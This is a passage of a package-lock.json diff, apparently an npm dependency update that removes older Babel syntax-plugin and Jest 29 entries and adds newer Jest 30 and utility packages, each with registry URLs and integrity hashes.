"https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.22.5.tgz", - "integrity": "sha512-gvyP4hZrgrs/wWMaocvxZ44Hw0b3W8Pe+cMxc8V1ULQ07oh8VNbIRaoD1LRZVTvD+0nieDKjfgKg89sD7rrKrg==", + "node_modules/slash": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", + "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" - }, "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "node": ">=8" } }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", + "node_modules/stack-utils": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", + "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", "dev": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" + "escape-string-regexp": "^2.0.0" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": ">=10" } }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", + "node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", "dev": true, "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "has-flag": "^4.0.0" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": ">=8" } }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", + "node_modules/to-regex-range": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", + "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", "dev": true, + "license": "MIT", "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" + "is-number": "^7.0.0" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "engines": { + "node": ">=8.0" } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", + } + }, + "dependencies": { + "@babel/code-frame": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.27.1.tgz", + "integrity": "sha512-cjQ7ZlQ0Mv3b47hABuTevyTuYN4i+loJKGeV9flcCgIK37cCXRh+L1bd3iBHlynerhQ7BhCkn2BPbQUL+rGqFg==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "requires": { + "@babel/helper-validator-identifier": "^7.27.1", + "js-tokens": "^4.0.0", + "picocolors": "^1.1.1" } }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } + "@babel/helper-validator-identifier": { + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.27.1.tgz", + "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", + "dev": true + }, + "@jest/diff-sequences": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/diff-sequences/-/diff-sequences-30.0.1.tgz", + "integrity": "sha512-n5H8QLDJ47QqbCNn5SuFjCRDrOLEZ0h8vAHCK5RL9Ls7Xa8AQLa/YxAc9UjFqoEDM48muwtBGjtMY5cr0PLDCw==", + "dev": true + }, + "@jest/get-type": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/get-type/-/get-type-30.0.1.tgz", + "integrity": "sha512-AyYdemXCptSRFirI5EPazNxyPwAL0jXt3zceFjaj8NFiKP9pOi0bfXonf6qkf82z2t3QWPeLCWWw4stPBzctLw==", + "dev": true }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", + "@jest/pattern": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/@jest/pattern/-/pattern-30.0.1.tgz", + "integrity": "sha512-gWp7NfQW27LaBQz3TITS8L7ZCQ0TLvtmI//4OwlQRx4rnWxcPNIYjxZpDcN4+UlGxgm3jS5QPz8IPTCkb59wZA==", "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" + "requires": { + "@types/node": "*", + "jest-regex-util": "30.0.1" }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" + "dependencies": { + "jest-regex-util": { + "version": "30.0.1", + "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-30.0.1.tgz", + "integrity": "sha512-jHEQgBXAgc+Gh4g0p3bCevgRCVRkB4VB70zhoAE48gxeSr1hfUOsM/C2WoJgVL7Eyg//hudYENbm3Ne+/dRVVA==", + "dev": true + } } }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.22.5.tgz", - "integrity": "sha512-1mS2o03i7t1c6VzH6fdQ3OA8tcEIxwG18zIPRp+UY1Ihv6W+XZzBCVxExF9upussPXJ0xE9XRHwMoNs1ep/nRQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "dependencies": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "dependencies": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.27.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - } - }, - "node_modules/@jridgewell/trace-mapping/node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@nicolo-ribaudo/semver-v6": { - "version": "6.3.3", - "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/semver-v6/-/semver-v6-6.3.3.tgz", - "integrity": "sha512-3Yc1fUTs69MG/uZbJlLSI3JISMn2UV2rg+1D/vROUqZyh3l6iYHCs7GMp+M40ZD7yOdDbYjJcU1oTJhrc+dGKg==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" - } - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/jest": { - "version": "29.5.3", - 